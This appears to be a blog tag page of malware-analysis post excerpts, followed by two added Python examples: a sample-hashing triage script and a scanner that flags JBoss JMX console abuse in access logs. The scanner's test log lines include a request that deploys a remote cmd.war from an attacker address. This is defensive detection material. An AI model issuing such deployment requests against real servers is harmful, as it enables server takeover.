Posts Tagged ‘analysis’

    Data Mining + Malware = Improved Analysis

    by  • April 30, 2012 • Uncategorized

    Over the past few weeks I have been talking with different analysts, programmers and RE folks about the future of malware analysis and how we combat changes in attacks. Ripping apart binaries and developing signatures based on TTPs doesn’t scale (...


    Adobe’s SWF Tools – CVE-2012-0754

    by  • March 6, 2012 • Uncategorized

    Yesterday Mila posted a Doc file exploiting the recent flash bug (CVE-2012-0754). Having not looked at it yet, I thought this would be a good way to test the new SWF tools Adobe released last night. I downloaded the files from the Contagio site he...


    Smart Hash Google Gadget

    by  • January 2, 2012 • Uncategorized

    Hashes and malware go together. When you get a new piece of malware the first thing you should do is create a hash and search for any information available on it. In some cases you may turn up nothing at all, but other times you may end up with a ...

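The first step the excerpt above describes, hashing a new sample and searching on the result, as an added example that is not code from the original post or from the Google Gadget it announces. It reads each sample once, feeds every chunk to several hash algorithms, groups byte-identical files by SHA-256 so duplicates are only looked up once, and builds the search strings to try. The sample contents are constructed stand-ins, and the VirusTotal URL layout is an assumption about that site rather than anything from the post.

```python
import hashlib
import io

# Constructed sample contents standing in for files under analysis (not real malware).
SAMPLES = {
    "dropper.exe": b"MZ\x90\x00" + b"A" * 4096,
    "dropper_copy.exe": b"MZ\x90\x00" + b"A" * 4096,   # byte-identical duplicate
    "loader.dll": b"MZ\x90\x00" + b"B" * 4096,
}

ALGORITHMS = ("md5", "sha1", "sha256")


def hash_stream(stream, algorithms=ALGORITHMS, chunk_size=65536):
    """Hash a binary stream once, feeding every chunk to all requested
    algorithms, so a large sample is read from disk a single time."""
    hashers = {name: hashlib.new(name) for name in algorithms}
    for chunk in iter(lambda: stream.read(chunk_size), b""):
        for h in hashers.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashers.items()}


def hash_bytes(data, algorithms=ALGORITHMS):
    return hash_stream(io.BytesIO(data), algorithms)


def hash_file(path, algorithms=ALGORITHMS):
    with open(path, "rb") as f:
        return hash_stream(f, algorithms)


def lookup_queries(hashes):
    """Search strings to try for a sample. The VirusTotal URL layout is an
    assumption about that site, not something taken from the post."""
    return [
        f"https://www.google.com/search?q={hashes['md5']}",
        f"https://www.google.com/search?q={hashes['sha256']}",
        f"https://www.virustotal.com/gui/file/{hashes['sha256']}",
    ]


def triage(samples):
    """Group samples by SHA-256 so duplicates are looked up once.
    Returns {sha256: {"names": [...], "hashes": {...}, "queries": [...]}}."""
    groups = {}
    for name, data in samples.items():
        hashes = hash_bytes(data)
        entry = groups.setdefault(
            hashes["sha256"],
            {"names": [], "hashes": hashes, "queries": lookup_queries(hashes)},
        )
        entry["names"].append(name)
    return groups


if __name__ == "__main__":
    for sha256, entry in triage(SAMPLES).items():
        print(sha256, entry["names"])
        for query in entry["queries"]:
            print("   ", query)
```

Searching on more than one algorithm matters in practice: older write-ups and signature databases are often indexed by MD5 only, while newer sources key on SHA-256, so a sample that turns up nothing under one hash may be well documented under another.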

    Analyzing CVE-2011-4369 – Part One

    by  • December 20, 2011 • Uncategorized

    Adobe pulled a fast one a couple days ago when they pushed out their most recent patch. In doing so they addressed CVE-2011-2462, but also mentioned another vulnerability that exploited the PRC format (also related to U3D). This additional vulnera...


    AESv3 CVE-2011-2462 Analysis

    by  • December 19, 2011 • Uncategorized

    Update: I added in some comments to the Origami library to show me the password used to encrypt the documents. The user encryption password used for the samples I have was a null password. If you would like the modified library, email me. In one o...


    Analysis of a Real JBOSS Hack

    by  • November 5, 2011 • Uncategorized

Summary This is an analysis of a recent attack observed on a large enterprise network. The attackers compromised multiple servers via JBOSS JMX console vulnerabilities. With this access they were able to install tools for remote access and tr...

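The excerpt above says the servers were compromised through the JBOSS JMX console. As an added example that is not from the original post or the incident it describes, the following scans web server access logs for the request pattern that kind of compromise leaves behind: requests to the JMX console and related JBoss admin paths, `invokeOp` calls against MBeans, deployment arguments pointing at an external URL, and unusual HTTP verbs. The log lines are constructed, and the paths and parameter names are assumptions based on the stock JBoss JMX console (`/jmx-console/HtmlAdaptor`), not details taken from the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache-style access log lines; not from the incident in the post.
LOG_LINES = [
    '203.0.113.5 - - [05/Nov/2011:02:13:44 +0000] "GET /jmx-console/ HTTP/1.1" 200 5123 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [05/Nov/2011:02:13:50 +0000] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:service=MainDeployer HTTP/1.1" 200 8821 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [05/Nov/2011:02:14:03 +0000] "HEAD /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service=MainDeployer&methodIndex=17&arg0=http://203.0.113.5/cmd.war HTTP/1.1" 200 0 "-" "Mozilla/4.0"',
    '10.0.0.7 - - [05/Nov/2011:08:00:12 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [05/Nov/2011:08:01:30 +0000] "GET /jmx-console/ HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
]

# Common log format: client, identd, user, [timestamp], "METHOD target PROTO", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# JBoss administrative entry points (assumed stock paths, not from the post).
ADMIN_PREFIXES = ("/jmx-console", "/web-console", "/invoker/")


def classify(line):
    """Return a finding dict for a request to a JBoss admin path, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.startswith(ADMIN_PREFIXES):
        return None

    params = parse_qs(parts.query)
    status = int(m.group("status"))
    reasons = ["admin_console_request"]
    if 200 <= status < 300:
        reasons.append("served_2xx")            # the console answered, not a 401/403
    if params.get("action", [""])[0] == "invokeOp":
        reasons.append("invokeOp")              # an MBean operation was invoked
    # A deploy operation handed a remote URL is the classic "drop a WAR" move.
    if any(v.startswith(("http://", "https://")) for vals in params.values() for v in vals):
        reasons.append("remote_deploy_url")
    if m.group("method") not in ("GET", "POST"):
        reasons.append("unusual_verb")          # e.g. HEAD against an admin path

    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": parts.path,
        "status": status,
        "reasons": reasons,
    }


def scan(lines):
    """Run classify() over every line and keep only admin-path hits."""
    return [f for f in (classify(l) for l in lines) if f]


def by_client(findings):
    """Count findings per source address, to see who is hammering the console."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(LOG_LINES):
        print(f["ip"], f["method"], f["path"], f["status"], ",".join(f["reasons"]))
    print(by_client(scan(LOG_LINES)))
```

The ordering of the flagged lines is the point: enumeration of the console (`inspectMBean`), then an `invokeOp` whose argument is a URL on the attacker's own host, with a 2xx response, is the sequence to look for when reconstructing how a JBoss server was turned into a foothold. A 401 on the same path from an internal address is noise by comparison, but worth keeping to see who else probed the console.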